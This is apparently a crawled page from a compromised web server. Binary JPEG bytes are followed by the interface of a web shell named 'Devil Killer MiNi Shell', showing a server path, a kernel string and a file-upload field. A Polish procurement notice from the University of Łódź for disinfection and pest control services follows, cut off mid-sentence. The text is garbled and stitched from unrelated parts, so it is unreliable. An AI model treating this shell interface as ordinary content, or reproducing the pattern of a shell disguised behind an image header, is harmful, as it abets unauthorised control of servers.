JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210804/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210804/0013700901-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00137009 z dnia 2021-08-04</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług DDD (w tym m. in. dezynfekcji, dezynsekcji, deratyzacji) oraz likwidacji gniazd owadów dla jednostek organizacyjnych Uniwersytetu Łódzkiego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">UNIWERSYTET ŁÓDZKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000001287</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Prezydenta Gabriela Narutowicza 68</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łódź</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">90-136</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL711 - Miasto Łódź</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@uni.lodz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.uni.lodz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług DDD (w tym m. in. dezynfekcji, dezynsekcji, deratyzacji) oraz likwidacji gniazd owadów dla jednostek organizacyjnych Uniwersytetu Łódzkiego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5e9a99e4-f524-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00137009</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> htps://platformazakupowa.pl/pn/uni.lodz <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiający<br/>ma Wykonawcą, w tym składanie ofert, odbywa się w formie elektronicznej za pośrednictwem<br/>platformazakupowa.pl (zwanej dalej Platformą) dostępnej pod adresem:<br/>https://www.platformazakupowa.pl/pn/uni.lodz</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne dotyczące wysyłania i odbierania dokumentów<br/>elektronicznych,elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy<br/>ich użyciu zostały opisane w Instrukcji dla Wykonawców (https://platformazakupowa.pl/strona/45-<br/>instrukcje oraz Regulaminie platformazakupowa.pl)</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1) Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, Uniwersytet Łódzki, ul. Narutowicza 68, 90-136 Łódź informuje, że:<br/>a. Administratorem danych osobowych jest Uniwersytet Łódzki z siedzibą ul. Narutowicza 68; 90-136<br/>Łódź.<br/>b. Administrator wyznaczył Inspektora Ochrony Danych, z którym można się kontaktować za<br/>pośrednictwem poczty elektronicznej: iod@uni.lodz.pl.<br/>c. Pani/Pana dane osobowe przetwarzane będą w celu związanym z przedmiotowym postępowaniem o<br/>udzielenie zamówienia publicznego, prowadzonego zgodnie z art. 11 ust. 5 pkt 1) ustawy z dnia 11<br/>września 2019 r. Prawo zamówień publicznych (t.j. Dz.U. z 2021 r., poz. 1129) pod nazwą Świadczenie<br/>usług DDD (w tym m.in. dezynfekcji, dezynsekcji, deratyzacji) oraz likwidacji gniazd owadów dla<br/>jednostek organizacyjnych Uniwersytetu Łódzkiego nr sprawy 50/ZP/2021. Pani/Pana dane osobowe będą przetwarzane, ponieważ jest to niezbędne do wypełnienia obowiązku<br/>prawnego ciążącego na administratorze (art. 6 ust. 1 lit. c RODO w związku z przepisami ustawy z<br/>dnia 11 września 2019 r. Prawo zamówień publicznych zwanej dalej ustawą Pzp).<br/>d. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp.<br/>e. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 i 4 ustawy Pzp tj. przez<br/>okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli okres obowiązywania<br/>umowy w sprawie zamówienia publicznego przekracza 4 lata, czas przechowywania obejmuje cały<br/>okres obowiązywania umowy w sprawie zamówienia publicznego.<br/>f. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp.<br/>g. W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO. Pozostałe informacje oraz oświadczenia o spełnieniu<br/>obowiązku informacyjnego zawarte zostały w dokumentacji postępowania, w tym w załączniku nr 1 do<br/>SWZ (formularz oferty).</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">50/ZP/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1) Przedmiotem zamówienia jest świadczenie usług DDD (w tym m.in. dezynfekcji, dezynsekcji,<br/>deratyzacji) oraz likwidacji gniazd owadów dla jednostek organizacyjnych Uniwersytetu<br/>Łódzkiego zgodnie ze szczegółowym opisem przedmiotu zamówienia (Załącznik nr 2 do SWZ)<br/>wskazującym na poszczególne rodzaje usług, w sposób określony w niniejszej SWZ oraz<br/>załącznikach, w tym w projekcie umowy (Załącznik nr 4 do SWZ). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90921000-9 - Usługi dezynfekcji i dezynsekcji budynków</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Na podstawie art. 441 ust. 1 Pzp Zamawiający przewiduje możliwość skorzystania z opcji w<br/>sposób nie modyfikujący ogólnego charakteru umowy, określając:<br/>a. rodzaj oraz maksymalna wartość opcji - usługi dezynfekcji, dezynsekcji, deratyzacji,<br/>ozonowania, dezodoryzacji oraz likwidacji gniazd owadów – zgodnie z zapotrzebowaniem<br/>jednostek organizacyjnych UŁ; maksymalna wartość opcji – do 50 % wartości brutto zawartej<br/>umowy;<br/>b. okoliczności skorzystania z opcji – zwiększenie zapotrzebowania na przedmiotowe usługi w<br/>związku z np. pojawieniem się gryzoni, insektów, gniazd owadów itp., koniecznością wykonania<br/>dezynfekcji w pomieszczeniach po przebywaniu w nich osób z chorobami zakaźnymi, w tym z Covid-19 itp. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji na pisemne zlecenie wykonania usług DDD</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji na pisemne zlecenie likwidacji gniazd owadów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> a. zdolności do występowania w obrocie gospodarczym – Zamawiający nie wyznacza<br/>szczegółowego warunku w tym zakresie;<br/>b. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów – Zamawiający nie wyznacza szczegółowego warunku w tym<br/>zakresie;<br/>c. sytuacji ekonomicznej i finansowej – Zamawiający nie wyznacza szczegółowego warunku w<br/>tym zakresie;<br/>d. zdolności technicznej lub zawodowej: Zamawiający wyznacza szczegółowy warunek w tym<br/>zakresie i wymaga od Wykonawcy wykazania, że:<br/>1. w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie,<br/>należycie wykonał (w przypadku świadczeń powtarzających się lub ciągłych również wykonuje) min. 2 usługi realizowane sukcesywnie i trwające, każda z nich, min. 12 następujących po sobie<br/>miesięcy, polegające na świadczeniu usług dezynfekcji, dezynsekcji i deratyzacji.<br/>W przypadku sukcesywnych usług nadal wykonywanych (umowy zawarte na okres dłuższy niż<br/>12 miesięcy), wykazywana usługa winna być wykonana na dzień składania ofert min. w<br/>wymiarze 12 następujących po sobie miesięcy w okresie ostatnich 3 lat.<br/>Ocena spełniania ww. warunku zostanie przeprowadzona na podstawie dokumentów, o których<br/>mowa w pkt 10.2) ppkt e. SWZ.<br/>Jeżeli wykonawca powołuje się na doświadczenie w realizacji usług, wykonywanych wspólnie z<br/>innymi wykonawcami, wykaz o którym mowa w pkt. 10.2) ppkt e. SWZ dotyczy usług, w których<br/>wykonaniu wykonawca ten bezpośrednio uczestniczył, a w przypadku świadczeń<br/>powtarzających się lub ciągłych, w których wykonywaniu bezpośrednio uczestniczył lub<br/>uczestniczy.<br/>Uwaga – okresy wyrażone w latach lub miesiącach liczy się wstecz od dnia, w którym upływa<br/>termin składania ofert w postępowaniu.<br/>2. dysponuje i skieruje do realizacji zamówienia publicznego:<br/>a) min. 2 osoby odpowiedzialne za świadczenie usług dezynfekcji, dezynsekcji, deratyzacji,<br/>posiadające każda minimum 5-letnie* doświadczenie zawodowe w świadczeniu ww. usług oraz<br/>b) min. 1 osobę odpowiedzialną za likwidację gniazd owadów posiadającą minimum 5-letnie*<br/>doświadczenie zawodowe w tym zakresie oraz<br/>c) min. 1 osobę bezpośrednio nadzorującą osoby skierowane do realizacji zamówienia,<br/>posiadającą min. 5-letnie* doświadczenie zawodowe w zakresie kierowania i nadzoru nad<br/>wykonywaniem usług DDD.<br/>* 1 rok doświadczenia zawodowego = 12 pełnych miesięcy<br/>Ocena spełniania ww. warunku zostanie przeprowadzona na podstawie dokumentów, o których mowa w pkt 10.2) ppkt f. SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) Do oferty Wykonawca dołącza:<br/>a. oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp, stanowiące dowód potwierdzający brak<br/>podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu na dzień składania ofert,<br/>tymczasowo zastępujący wymagane przez zamawiającego podmiotowe środki dowodowe, w zakresie wskazanym przez zamawiającego – załącznik nr 3a i 3b do SWZ;<br/>1. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym<br/>mowa w pkt 10.1)a. SWZ składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw<br/>wykluczenia oraz spełnianie warunków udziału w postepowaniu, w jakim każdy z wykonawców<br/>wykazuje spełnianie warunków udziału w postępowaniu.<br/>2. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji pomiotów udostępniających<br/>zasoby, przedstawia, wraz z oświadczeniem, o którym mowa w pkt 10.1) ppkt SWZ, także<br/>oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw do wykluczenia tego<br/>podmiotu oraz spełnianie warunków udziału w postępowaniu, w zakresie, w jakim Wykonawca<br/>powołuje się na jego zasoby.<br/>2) Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia podmiotowych środków<br/>dowodowych:<br/>a. oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5) ustawy Pzp, o braku przynależności do<br/>tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów (t.j. Dz. U. z 2021 r. poz. 275 z późn. zm.), z innym Wykonawcą, który złożył odrębną<br/>ofertę, ofertę częściową albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z<br/>dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej niezależnie<br/>od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 5 do SWZ;<br/>b. odpisu lub informacji z Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej<br/>niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, z<br/>zastrzeżeniem pkt 10.4) SWZ;<br/>c. zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie<br/>zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy Pzp, wystawionego nie<br/>wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub<br/>opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że<br/>odpowiednio przed upływem terminu składania ofert wykonawca dokonał płatności należnych<br/>podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat<br/>tych należności;<br/>d. zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu<br/>Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej<br/>Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z<br/>opłacaniem składek na ubezpieczenie społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy<br/>Pzp, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z<br/>opłacaniem składek na ubezpieczenie społecznego lub zdrowotne wraz z zaświadczeniem albo innym<br/>dokumentem Zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed<br/>upływem terminu składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenie<br/>społeczne lub zdrowotne wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie<br/>spłat tych należności.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">e. wykazu usług wykonanych, a w przypadku świadczeń powtarzających się<br/>lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności<br/>jest krótszy – w tym okresie, wraz z podaniem ich przedmiotu, dat wykonania i podmiotów, na rzecz<br/>których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy<br/>usługi te zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są<br/>referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usług zostały<br/>wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli<br/>wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów –<br/>oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal<br/>wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być<br/>wystawione w okresie ostatnich 3 miesięcy – wg wzory stanowiącego Załącznik nr 7 do SWZ, na<br/>potwierdzenie spełniania warunku udziału w postępowaniu, o którym mowa w pkt 8.2) ppkt d.1 SWZ;<br/>f. wykazu osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich doświadczenia niezbędnego do wykonania zamówienia publicznego, a także zakresu wykonywanych<br/>przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – wg wzoru<br/>stanowiącego Załącznik nr 7 do SWZ, na potwierdzenie spełniania warunku udziału w postępowaniu, o<br/>którym mowa w pkt 8.2) ppkt d.2 SWZ</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno<br/>być załączone do oferty. Forma, w jakiej powinno zostać sporządzone i złożone<br/>pełnomocnictwo, została określona w pkt 11 SWZ.<br/>2) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich<br/>nie może podlegać wykluczeniu z powodu niespełnienia warunków, o których mowa w art. 108<br/>ust. 1 oraz art. 109 ust. 1 pkt 1 i 4 ustawy Pzp, natomiast 